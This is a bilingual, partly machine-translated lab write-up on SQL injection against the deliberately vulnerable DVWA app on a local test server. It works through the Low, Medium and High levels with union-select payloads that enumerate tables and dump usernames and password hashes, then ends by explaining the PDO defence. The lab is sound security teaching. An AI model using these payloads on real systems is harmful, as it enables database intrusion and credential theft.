table of Contents
1, SQL injection vulnerability principle
Second, the experimental environment
Third, the experimental procedures
A, SQL injection
1, SQL injection vulnerability principle
The SQL commands inserted into the Web form submit or enter the domain name query string, or page submission, so as to achieve deception server to execute malicious SQL commands.
2, SQL injection type
- Character
- Numeric
- Search Type
3, SQL injection process
- Determines whether there is the injection, the injection is numeric or character;
- Guess the number of fields SQL query statement;
- Determining a display position;
- Get the current database;
- Access to the database tables;
- Gets the field name in the table;
- Download Data
Second, the experimental environment
1, the test machine: the physical machine Windows 10, remote login DVWA; installation BurpSuite
2, DVWA server: Windows Server 2003 (192.168.247.129), start phpStudy.
Third, the experimental procedures
Security Level: LOW
View source
As can be seen from the source, LOW level SQL injection of the contents of the parameter id, and any inspection filtration obvious SQL injection, and is injected into the character.
scenes to be used
1, it is determined whether there is the injection, the injection is character or numeric
Input 1, the query is successful, SQL injection
Input 1 'and' 1 '=' 1 or 1 'or' 1234 '=' 1234, a successful return results show that the SQL injection for the character.
2, guess the number of fields SQL query statement;
In input box 1 'order by # 1 and 1' order by 2 # returns to normal; Comparative source, this query statement means that the data users table user_id press the first (second) fields 1 .
Input box in the input 1 'order by # 3, an error is returned (Unknown column' 3 'in' order clause '), specifies the number of fields in the table 2, there are two data
3, the display position of the field is determined
When determining the number of fields, then use union select union queries continue to obtain data
1 'union select 1,2 # // 1 shown in the First name, Surname 2 shows the
4、获取当前的数据库名
1' union select version(),database() # //在1的位置显示数据库的版本,在2的位置显示数据库名
5、获取数据库中的表
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() # //在2的位置显示数据库中的表
6、获取指定表中的字段名
1' union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users’ # //在2的位置显示users表中的字段名
7、获取数据
1' union select user,password from users # //在1的位置显示用户名,在2的位置显示加密的密码
使用SOMD5对密码进行解密
安全等级:Medium
查看源码
观察源码可以看到mysql_real_escape_string函数对特殊字符\x00、\n、\r、\x1a、'、" 等进行转义;存在数字型SQL注入;同时设置了下拉选择表单,控制用户的输入;由下图可以看出用户只能选择数字1-5。
使用场景
1、判断是否存在注入,注入是字符型还是数字型
借助Burp Suite工具对抓取的数据包进行修改(Post方式),实现SQL注入。
1 and 1=1 或者 1 or 1234 = 1234 //均成功出现结果,存在SQL注入,且为数字型
2、猜解SQL查询语句中的字段数
1 order by 2
通过尝试,判断字段数为2
3、确定显示位置
1 union select 1,2 //1显示在First name的位置,2显示在Surname的位置
4、获取当前数据库名
1 union select 1,database() //在2的位置显示数据库名dvwa
5、获取数据库中的表
1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
6、获取指定表中的字段名
1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273
因为table_name='users' 中还有单引号,会进行转义,所以需要将 'users' 进行编码,然后进行查询。
7、获取数据
1 union select user,password from users //获取用户名和加密的密码
可通过解密工具,得到明文密码(https://www.somd5.com/)
安全级别:High
查看源码
High级别在SQL查询语句中添加了LIMIT 1,一次控制值输入一个结果;我们可以通过 # 将其注释掉。其余操作与Low安全级别的操作一致。
1’ or ‘1234’ = ‘1234 #
1’ order by 1 #
1' union select 1,2 #
1’ union select 1,database() #
1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #
1' union select user,password from users #
安全级别:Impossible
查看源码
Impossible安全级别采用了PDO技术,划清了代码与数据的界限,从而有效地防御SQL注入; 且只有当返回的查询结果数量为1时,才会输出。